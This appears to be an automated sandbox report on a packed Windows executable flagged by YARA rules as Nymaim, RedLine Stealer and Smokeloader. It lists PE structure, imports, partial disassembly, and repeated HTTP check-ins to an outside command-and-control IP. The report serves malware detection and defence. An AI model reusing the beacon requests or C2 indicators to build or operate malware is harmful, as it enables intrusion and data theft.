                    add byte ptr [eax], al
                    add dword ptr [eax+00000000h], eax
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    jnle 00007F99FCB2ECF2h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al

                    Rich Headers

                    Programming Language:
                    • [C++] VS2008 build 21022
                    • [ASM] VS2008 build 21022
                    • [ C ] VS2008 build 21022
                    • [IMP] VS2005 build 50727
                    • [RES] VS2008 build 21022
                    • [LNK] VS2008 build 21022

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x6f05b0x6f.idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x660000x8234.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x4ac8140x18iqkzmigc
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    0x10000x650000x3ae0074f57d58fbfdfdcc88b14b347dcdf64fFalse0.9952312234607219data7.941794412700174IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x660000x82340x3c00fa4eeacd684a9a1b8728647c1d2560e8False0.9262369791666667data7.693474866742781IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata 0x6f0000x10000x2006eb091ff88873fe4d3f846082d82dda4False0.154296875data1.0965193819233IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    0x700000x2980000x200cf6471dafce72c7e87e1653bd81b07c6unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    iqkzmigc0x3080000x1a80000x1a7e005066610809911025e1dde63177e679acFalse0.9920429307357712data7.9499747194883374IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    afatghvh0x4b00000x10000x600f337a217146227c7e9cafe951ac9ab45False0.603515625data5.205812931078851IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .taggant0x4b10000x30000x22001fc31b3b91c236382acde4613866b604False0.07065716911764706DOS executable (COM)0.8050504511683647IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                    Resources

                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_CURSOR0x664600xea8data1.0029317697228144
                    RT_CURSOR0x673080x8a8OpenPGP Public Key1.0049638989169676
                    RT_CURSOR0x67bb00x568data1.0079479768786128
                    RT_CURSOR0x681180xea8data1.0029317697228144
                    RT_CURSOR0x68fc00x8a8data1.0049638989169676
                    RT_CURSOR0x698680x568data0.5228260869565218
                    RT_ICON0x4ac8740x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.7557603686635944
                    RT_ICON0x4ac8740x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.7557603686635944
                    RT_ICON0x4acf3c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilIndia0.6829875518672199
                    RT_ICON0x4acf3c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilSri Lanka0.6829875518672199
                    RT_ICON0x4af4e40x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilIndia0.8058510638297872
                    RT_ICON0x4af4e40x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilSri Lanka0.8058510638297872
                    RT_STRING0x6cea80x252emptyTamilIndia0
                    RT_STRING0x6cea80x252emptyTamilSri Lanka0
                    RT_STRING0x6d0fc0x396emptyTamilIndia0
                    RT_STRING0x6d0fc0x396emptyTamilSri Lanka0
                    RT_STRING0x6d4940x520emptyTamilIndia0
                    RT_STRING0x6d4940x520emptyTamilSri Lanka0
                    RT_STRING0x6d9b40x3eeemptyTamilIndia0
                    RT_STRING0x6d9b40x3eeemptyTamilSri Lanka0
                    RT_ACCELERATOR0x6dda40x58emptyTamilIndia0
                    RT_ACCELERATOR0x6dda40x58emptyTamilSri Lanka0
                    RT_GROUP_CURSOR0x6ddfc0x30empty0
                    RT_GROUP_CURSOR0x6de2c0x30empty0
                    RT_GROUP_ICON0x4af94c0x30dataTamilIndia0.9375
                    RT_GROUP_ICON0x4af94c0x30dataTamilSri Lanka0.9375
                    RT_VERSION0x4af97c0x254data0.5436241610738255
                    RT_MANIFEST0x4afbd00x152ASCII text, with CRLF line terminators0.6479289940828402

                    Imports

                    DLLImport
                    kernel32.dlllstrcpy

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    TamilIndia
                    TamilSri Lanka

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Nov 30, 2024 16:41:56.513273001 CET4970480192.168.2.5185.156.72.65
                    Nov 30, 2024 16:41:56.633296967 CET8049704185.156.72.65192.168.2.5
                    Nov 30, 2024 16:41:56.633661032 CET4970480192.168.2.5185.156.72.65
                    Nov 30, 2024 16:41:56.633661032 CET4970480192.168.2.5185.156.72.65
                    Nov 30, 2024 16:41:56.754298925 CET8049704185.156.72.65192.168.2.5
                    Nov 30, 2024 16:42:18.560966969 CET8049704185.156.72.65192.168.2.5
                    Nov 30, 2024 16:42:18.561034918 CET4970480192.168.2.5185.156.72.65
                    Nov 30, 2024 16:42:18.561176062 CET4970480192.168.2.5185.156.72.65
                    Nov 30, 2024 16:42:18.681977987 CET8049704185.156.72.65192.168.2.5
                    Nov 30, 2024 16:42:21.573402882 CET4972280192.168.2.5185.156.72.65
                    Nov 30, 2024 16:42:21.693538904 CET8049722185.156.72.65192.168.2.5
                    Nov 30, 2024 16:42:21.693730116 CET4972280192.168.2.5185.156.72.65
                    Nov 30, 2024 16:42:21.693939924 CET4972280192.168.2.5185.156.72.65
                    Nov 30, 2024 16:42:21.813941956 CET8049722185.156.72.65192.168.2.5
                    Nov 30, 2024 16:42:43.624691963 CET8049722185.156.72.65192.168.2.5
                    Nov 30, 2024 16:42:43.624752998 CET4972280192.168.2.5185.156.72.65
                    Nov 30, 2024 16:42:43.624847889 CET4972280192.168.2.5185.156.72.65
                    Nov 30, 2024 16:42:43.745034933 CET8049722185.156.72.65192.168.2.5
                    Nov 30, 2024 16:42:46.635843039 CET4977880192.168.2.5185.156.72.65
                    Nov 30, 2024 16:42:46.762685061 CET8049778185.156.72.65192.168.2.5
                    Nov 30, 2024 16:42:46.762792110 CET4977880192.168.2.5185.156.72.65
                    Nov 30, 2024 16:42:46.763020039 CET4977880192.168.2.5185.156.72.65
                    Nov 30, 2024 16:42:46.986076117 CET8049778185.156.72.65192.168.2.5
                    Nov 30, 2024 16:42:54.792233944 CET4977880192.168.2.5185.156.72.65
                    Nov 30, 2024 16:42:57.810971975 CET4980580192.168.2.5185.156.72.65
                    Nov 30, 2024 16:42:57.931529999 CET8049805185.156.72.65192.168.2.5
                    Nov 30, 2024 16:42:57.931615114 CET4980580192.168.2.5185.156.72.65
                    Nov 30, 2024 16:42:57.933007956 CET4980580192.168.2.5185.156.72.65
                    Nov 30, 2024 16:42:58.052999020 CET8049805185.156.72.65192.168.2.5
                    Nov 30, 2024 16:43:19.884118080 CET8049805185.156.72.65192.168.2.5
                    Nov 30, 2024 16:43:19.884310007 CET4980580192.168.2.5185.156.72.65
                    Nov 30, 2024 16:43:19.884516001 CET4980580192.168.2.5185.156.72.65
                    Nov 30, 2024 16:43:20.004359961 CET8049805185.156.72.65192.168.2.5
                    Nov 30, 2024 16:43:22.888974905 CET4986080192.168.2.5185.156.72.65
                    Nov 30, 2024 16:43:23.009064913 CET8049860185.156.72.65192.168.2.5
                    Nov 30, 2024 16:43:23.009143114 CET4986080192.168.2.5185.156.72.65
                    Nov 30, 2024 16:43:23.009505033 CET4986080192.168.2.5185.156.72.65
                    Nov 30, 2024 16:43:23.129424095 CET8049860185.156.72.65192.168.2.5
                    Nov 30, 2024 16:43:44.962527037 CET8049860185.156.72.65192.168.2.5
                    Nov 30, 2024 16:43:44.962584972 CET4986080192.168.2.5185.156.72.65
                    Nov 30, 2024 16:43:44.962718964 CET4986080192.168.2.5185.156.72.65
                    Nov 30, 2024 16:43:45.082714081 CET8049860185.156.72.65192.168.2.5
                    Nov 30, 2024 16:43:47.969618082 CET4991580192.168.2.5185.156.72.65
                    Nov 30, 2024 16:43:48.089755058 CET8049915185.156.72.65192.168.2.5
                    Nov 30, 2024 16:43:48.090363026 CET4991580192.168.2.5185.156.72.65
                    Nov 30, 2024 16:43:48.093626976 CET4991580192.168.2.5185.156.72.65
                    Nov 30, 2024 16:43:48.213737965 CET8049915185.156.72.65192.168.2.5
                    Nov 30, 2024 16:44:10.056679010 CET8049915185.156.72.65192.168.2.5
                    Nov 30, 2024 16:44:10.056826115 CET4991580192.168.2.5185.156.72.65
                    Nov 30, 2024 16:44:10.058100939 CET4991580192.168.2.5185.156.72.65
                    Nov 30, 2024 16:44:10.178081036 CET8049915185.156.72.65192.168.2.5
                    Nov 30, 2024 16:44:13.075895071 CET4997180192.168.2.5185.156.72.65
                    Nov 30, 2024 16:44:13.196286917 CET8049971185.156.72.65192.168.2.5
                    Nov 30, 2024 16:44:13.196377039 CET4997180192.168.2.5185.156.72.65
                    Nov 30, 2024 16:44:13.196744919 CET4997180192.168.2.5185.156.72.65
                    Nov 30, 2024 16:44:13.317316055 CET8049971185.156.72.65192.168.2.5
                    Nov 30, 2024 16:44:35.126359940 CET8049971185.156.72.65192.168.2.5
                    Nov 30, 2024 16:44:35.126427889 CET4997180192.168.2.5185.156.72.65
                    Nov 30, 2024 16:44:35.126614094 CET4997180192.168.2.5185.156.72.65
                    Nov 30, 2024 16:44:35.246751070 CET8049971185.156.72.65192.168.2.5
                    Nov 30, 2024 16:44:38.139915943 CET4998380192.168.2.5185.156.72.65
                    Nov 30, 2024 16:44:38.259958029 CET8049983185.156.72.65192.168.2.5
                    Nov 30, 2024 16:44:38.264117002 CET4998380192.168.2.5185.156.72.65
                    Nov 30, 2024 16:44:38.264117002 CET4998380192.168.2.5185.156.72.65
                    Nov 30, 2024 16:44:38.384196043 CET8049983185.156.72.65192.168.2.5
                    Nov 30, 2024 16:45:00.214226961 CET8049983185.156.72.65192.168.2.5
                    Nov 30, 2024 16:45:00.216082096 CET4998380192.168.2.5185.156.72.65
                    Nov 30, 2024 16:45:00.216083050 CET4998380192.168.2.5185.156.72.65
                    Nov 30, 2024 16:45:00.336066008 CET8049983185.156.72.65192.168.2.5
                    Nov 30, 2024 16:45:03.237371922 CET4998480192.168.2.5185.156.72.65
                    Nov 30, 2024 16:45:03.357424974 CET8049984185.156.72.65192.168.2.5
                    Nov 30, 2024 16:45:03.357503891 CET4998480192.168.2.5185.156.72.65
                    Nov 30, 2024 16:45:03.358014107 CET4998480192.168.2.5185.156.72.65
                    Nov 30, 2024 16:45:03.477952003 CET8049984185.156.72.65192.168.2.5
                    Nov 30, 2024 16:45:25.292727947 CET8049984185.156.72.65192.168.2.5
                    Nov 30, 2024 16:45:25.292807102 CET4998480192.168.2.5185.156.72.65
                    Nov 30, 2024 16:45:25.293173075 CET4998480192.168.2.5185.156.72.65
                    Nov 30, 2024 16:45:25.413480997 CET8049984185.156.72.65192.168.2.5
                    Nov 30, 2024 16:45:28.317323923 CET4998580192.168.2.5185.156.72.65
                    Nov 30, 2024 16:45:28.437403917 CET8049985185.156.72.65192.168.2.5
                    Nov 30, 2024 16:45:28.437663078 CET4998580192.168.2.5185.156.72.65
                    Nov 30, 2024 16:45:28.437895060 CET4998580192.168.2.5185.156.72.65
                    Nov 30, 2024 16:45:28.557924986 CET8049985185.156.72.65192.168.2.5
                    Nov 30, 2024 16:45:46.233858109 CET4998580192.168.2.5185.156.72.65
                    Nov 30, 2024 16:45:49.248595953 CET4998680192.168.2.5185.156.72.65
                    Nov 30, 2024 16:45:49.368782043 CET8049986185.156.72.65192.168.2.5
                    Nov 30, 2024 16:45:49.368866920 CET4998680192.168.2.5185.156.72.65
                    Nov 30, 2024 16:45:49.369179010 CET4998680192.168.2.5185.156.72.65
                    Nov 30, 2024 16:45:49.489309072 CET8049986185.156.72.65192.168.2.5

                    HTTP Request Dependency Graph

                    • 185.156.72.65

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.549704185.156.72.65807268C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 16:41:56.633661032 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.549722185.156.72.65807268C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 16:42:21.693939924 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.549778185.156.72.65807268C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 16:42:46.763020039 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.549805185.156.72.65807268C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 16:42:57.933007956 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.549860185.156.72.65807268C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 16:43:23.009505033 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.549915185.156.72.65807268C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 16:43:48.093626976 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.549971185.156.72.65807268C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 16:44:13.196744919 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.549983185.156.72.65807268C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 16:44:38.264117002 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    8192.168.2.549984185.156.72.65807268C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 16:45:03.358014107 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    9192.168.2.549985185.156.72.65807268C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 16:45:28.437895060 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    10192.168.2.549986185.156.72.65807268C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 16:45:49.369179010 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    System Behavior

                    General

                    Target ID:0
                    Start time:10:41:52
                    Start date:30/11/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0x400000
                    File size:2'008'064 bytes
                    MD5 hash:24FD69187BD9CB0BFBAE4C051DB9E658
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4453741215.0000000004790000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000003.2004309647.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    Reputation:low
                    Has exited:false

                    Disassembly

                    Reset < >

                      Execution Graph

                      Execution Coverage:1.7%
                      Dynamic/Decrypted Code Coverage:5.3%
                      Signature Coverage:3.6%
                      Total number of Nodes:561
                      Total number of Limit Nodes:5
                      execution_graph 28274 4797cb9 28277 4797cc4 28274->28277 28278 4797cd3 28277->28278 28281 4798464 28278->28281 28282 479847f 28281->28282 28283 4798488 CreateToolhelp32Snapshot 28282->28283 28284 47984a4 Module32First 28282->28284 28283->28282 28283->28284 28285 47984b3 28284->28285 28287 4797cc3 28284->28287 28288 4798123 28285->28288 28289 479814e 28288->28289 28290 4798197 28289->28290 28291 479815f VirtualAlloc 28289->28291 28290->28290 28291->28290 28292 40a0b1 28293 40a0bd __FrameHandler3::FrameUnwindToState 28292->28293 28320 409e11 28293->28320 28295 40a0c4 28296 40a217 28295->28296 28300 40a0ee ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 28295->28300 28347 40a58a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter __FrameHandler3::FrameUnwindToState 28296->28347 28298 40a21e 28348 4106ab 21 API calls __FrameHandler3::FrameUnwindToState 28298->28348 28304 40a10d 28300->28304 28305 40a18e 28300->28305 28346 410685 39 API calls 3 library calls 28300->28346 28301 40a224 28349 41066f 21 API calls __FrameHandler3::FrameUnwindToState 28301->28349 28303 40a22c 28328 40a6a5 28305->28328 28321 409e1a 28320->28321 28350 40a2ec IsProcessorFeaturePresent 28321->28350 28323 409e26 28351 40b77d 10 API calls 2 library calls 28323->28351 28325 409e2f 28325->28295 28326 409e2b 28326->28325 28352 40b79c 7 API calls 2 library calls 28326->28352 28353 40b570 28328->28353 28331 40a194 28332 412288 28331->28332 28355 41816d 28332->28355 28334 40a19c 28337 4087e0 28334->28337 28335 412291 28335->28334 28361 41841d 39 API calls 28335->28361 28364 402460 28337->28364 28340 402460 43 API calls 28341 408807 28340->28341 28368 405a50 28341->28368 28346->28305 28347->28298 28348->28301 28349->28303 28350->28323 28351->28326 28352->28325 28354 40a6b8 GetStartupInfoW 28353->28354 28354->28331 28356 418176 28355->28356 28360 4181a8 28355->28360 28362 41299d 39 API calls 3 library calls 28356->28362 28358 418199 28363 417f78 49 API calls 3 library calls 28358->28363 28360->28335 28361->28335 28362->28358 28363->28360 28365 402483 28364->28365 28365->28365 28683 402760 28365->28683 28367 402495 28367->28340 28710 410822 GetSystemTimeAsFileTime 28368->28710 28370 405a9f 28712 4106e2 28370->28712 28373 402760 43 API calls 28374 405ada 28373->28374 28375 402760 43 API calls 28374->28375 28376 405ca0 28375->28376 28715 403ab0 28376->28715 28378 405e9f 28727 406c40 28378->28727 28380 40620c 28381 402460 43 API calls 28380->28381 28382 40621c 28381->28382 28737 402390 28382->28737 28384 406230 28745 406ee0 28384->28745 28386 40630a 28387 402460 43 API calls 28386->28387 28388 40631a 28387->28388 28389 402390 39 API calls 28388->28389 28390 40632e 28389->28390 28391 406404 28390->28391 28392 406336 28390->28392 28808 407290 53 API calls 2 library calls 28391->28808 28800 406f60 53 API calls 2 library calls 28392->28800 28395 406409 28397 402460 43 API calls 28395->28397 28396 40633b 28398 402460 43 API calls 28396->28398 28400 406419 28397->28400 28399 40634b 28398->28399 28801 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 28399->28801 28404 402390 39 API calls 28400->28404 28402 406354 28403 402390 39 API calls 28402->28403 28405 40635c 28403->28405 28406 40642d 28404->28406 28802 406ff0 53 API calls 2 library calls 28405->28802 28562 4064ee 28406->28562 28809 407310 53 API calls 2 library calls 28406->28809 28408 406361 28413 402460 43 API calls 28408->28413 28411 40643a 28415 402460 43 API calls 28411->28415 28412 4064f8 28416 402460 43 API calls 28412->28416 28414 406371 28413->28414 28803 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 28414->28803 28418 40644a 28415->28418 28420 406508 28416->28420 28810 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 28418->28810 28425 402390 39 API calls 28420->28425 28421 40637a 28423 402390 39 API calls 28421->28423 28422 406453 28424 402390 39 API calls 28422->28424 28426 406382 28423->28426 28427 40645b 28424->28427 28428 40651c 28425->28428 28804 407070 53 API calls 2 library calls 28426->28804 28811 407390 53 API calls 2 library calls 28427->28811 28432 406603 28428->28432 28818 4076b0 53 API calls 2 library calls 28428->28818 28430 406387 28438 402460 43 API calls 28430->28438 28828 407a50 53 API calls 2 library calls 28432->28828 28434 406460 28440 402460 43 API calls 28434->28440 28436 40660d 28441 402460 43 API calls 28436->28441 28437 406529 28443 402460 43 API calls 28437->28443 28439 406397 28438->28439 28447 402390 39 API calls 28439->28447 28442 406470 28440->28442 28444 40661d 28441->28444 28812 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 28442->28812 28446 406539 28443->28446 28455 402390 39 API calls 28444->28455 28819 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 28446->28819 28450 4063ab 28447->28450 28448 406479 28451 402390 39 API calls 28448->28451 28453 4063cc 28450->28453 28454 4063af 28450->28454 28456 406481 28451->28456 28452 406542 28457 402390 39 API calls 28452->28457 28806 407180 53 API calls 2 library calls 28453->28806 28805 407100 53 API calls 2 library calls 28454->28805 28460 406631 28455->28460 28813 407410 53 API calls 2 library calls 28456->28813 28462 40654a 28457->28462 28466 4066b3 28460->28466 28467 406635 28460->28467 28820 407730 53 API calls 2 library calls 28462->28820 28464 4063d1 28475 402460 43 API calls 28464->28475 28465 4063b4 28476 402460 43 API calls 28465->28476 28835 407c70 53 API calls 2 library calls 28466->28835 28829 407ae0 53 API calls 2 library calls 28467->28829 28468 406486 28474 402460 43 API calls 28468->28474 28469 40654f 28478 402460 43 API calls 28469->28478 28472 4066b8 28481 402460 43 API calls 28472->28481 28473 40663a 28482 402460 43 API calls 28473->28482 28477 406496 28474->28477 28479 4063e1 28475->28479 28480 4063c4 28476->28480 28489 402390 39 API calls 28477->28489 28483 40655f 28478->28483 28491 